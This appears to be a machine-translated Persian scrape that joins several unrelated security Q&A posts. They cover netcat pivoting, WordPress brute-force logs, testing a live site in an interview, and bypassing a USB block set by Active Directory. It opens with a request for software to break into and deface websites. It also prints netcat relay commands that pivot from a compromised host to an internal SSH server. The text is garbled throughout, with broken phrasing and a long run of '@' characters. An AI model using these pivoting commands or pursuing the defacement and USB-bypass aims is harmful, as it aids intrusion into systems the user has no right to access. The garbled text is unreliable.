چگونه می توانم با استفاده از برنامه های لینوکس یا cmd می توانم سطح امنیت یا امنیت وب سایت های https را دریافت کنم و بهترین نرم افزار برای نفوذ به وب سایت برای از بین بردن صفحات وب است
آزمون نفوذ – استفاده از Netcat به Pivot
بنابراین من یک پوسته را به دستگاه A که اس اس را نصب نکرده است و نمی توانم پوسته تتی را دریافت کنم (من تمام ورق های تقلب را امتحان کردم، من فکر می کنم این عمدا است)
Through دستگاه AI میتواند دستگاه B را که دارای یک سرور ssh در حال اجرا در پورت 2222 است را ببیند.
آنچه که من می خواهم انجام دهم این است که چطور از netcat برای اتصال به ssh به صورت دستی استفاده کنم یا از netcat برای رفتن از ماشین حمله به ماشین استفاده کنم من به ماشین B.
ابتدا سعی کردم nc -lvp 444 -c 'nc machine.b 2222' اما من نمی توانم به دستگاه A متصل شود، من حدس می زنم قوانین فایروال.
بعدا سعی کردم اتصال مجدد به دستگاه حمله من nc attacking.machine 444 -c 'nc machine.b 2222' که کار می کند اما متوجه شدم که وقتی به ماشین حمله من فرستاده می شود، می توانم دسترسی به پورت برای اتصال به آن با ssh.
این طراحی شبکه است … من فکر می کنم
احراز هویت – آزمون نفوذ / هک – امنیت اطلاعات پشته تبادل
من یک حرفه ای امنیت اطلاعات نیستم. من یک وب توسعه دهنده خودمختار هستم بنابراین امیدوارم این سوال خیلی ساده نباشد
من یک فروشگاه وب را از طریق وردپرس با استفاده از WooCommerce راه اندازی کرده ام و به همین دلیل من همچنین برخی از امنیت (iThemes Security) را برای نظارت تلاش های ورود به سیستم و غیره iThemes Security چندین تلاش را در طول 2 ماه گذشته برجسته کرده است که با توجه به کلمات عبور قوی و یا این واقعیت که "admin" به عنوان یک نام کاربری ممنوع است، منع شده است.
در حال اجرا whois در پایگاه داده RIPE whois جستجو می کند. آدرس آی پی "مهاجمان" با FOP Tokarchuk Oleksandr Stepanovich در اوکراین ([email protected]) و World Hosting Farm در ایرلند ([email protected]) مطرح شد.
FOP Tokarchuk Oleksandr Stepanovich در اوکراین
11 اقدام خشونت آمیز 2 ماه پیش (لایسنس نامعتبر) و 3 تلاش نیروی بیرحمانه در حال حاضر تلاش برای استفاده از "admin" به عنوان نام کاربری
مزرعه میزبانی میزبان جهانی در ایرلند
6 نیروی بی رحم تلاش 3 هفته پیش.
ذخیره e هنوز زنده نیست چون پایگاه داده های موجود در حال حاضر در حال ساخت است، بنابراین هیچ اطلاعاتی در مورد مشتریان در معرض خطر قرار نخواهد گرفت. هر تلاش باعث قفل کردن 2 ساعت برای آدرس IP مربوطه شد و ایمیل ها به من از وب سایت فرستاده شدند که به من اطلاع داده شد که آنها قفل شده اند. سپس قفل آنها را به ممنوعیت کامل تبدیل کردم بنابراین از لحاظ نظری تلاش های بیشتری از طریق آن آدرس های IP انجام نمی شود. امیدوارم در این مورد صحیح باشم.
آنچه که من تعجب می کنم این است که آیا باید با مسئولین مسئول مربوطه از طریق آدرس های ایمیل@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@. قطعه از سیاهههای مربوط به آدرس IP و زمان تلاش؟
آیا یک ایده خوب برای آزمایش یک وب سایت شرکتی زنده به عنوان بخشی از یک پروسه مصاحبه است؟
بسیاری از شرکت ها امروز به عنوان بخشی از روند مصاحبه به چالش می پردازند، اغلب بر روی برنامه های نمونه، من هرگز از تست در یک سایت زنده به عنوان بخشی از مصاحبه شنیده ام.
آیا یک دنباله کاغذ دارید؟ آیا یک ایمیل از طرف کسی در سطح بالا تایید این وجود دارد؟ اگر نه، من می خواهم یک ایمیل از کسی در سطح مدیر و یا بالاتر که نشان می دهد شما اجازه داشته باشد. سپس در یک زمان موافق و همه چیز را در نوشتن.
آیا آنها به دنبال تست قلم آزاد هستند؟ شاید، اما آه مرد این است که سایه اگر درست باشد.
آزمون نفوذ – چگونه برای جلوگیری از محدودیت دسترسی USB قرار داده شده توسط Active Directory؟
من به منظور مشارکت در محل برای دیدن آنچه که من می توانم از یکی از لپ تاپ های خود پیدا کنم. آنها یک سیاست برای جلوگیری از دسترسی USB از طریق Active Directory دارند، مثلا هنگامی که سعی می کنید به درایو USB دسترسی داشته باشید، دسترسی به آن را انکار می کنید، برای اطلاعات بیشتر اینجا را ببینید.
آیا راهی برای دور زدن این وجود دارد؟ آیا ابزارهایی مانند Bash Bunny همچنان کامیابی را اجرا می کنند، صرف نظر از اینکه من بتوانم به آن دسترسی پیدا کنم یا نه؟
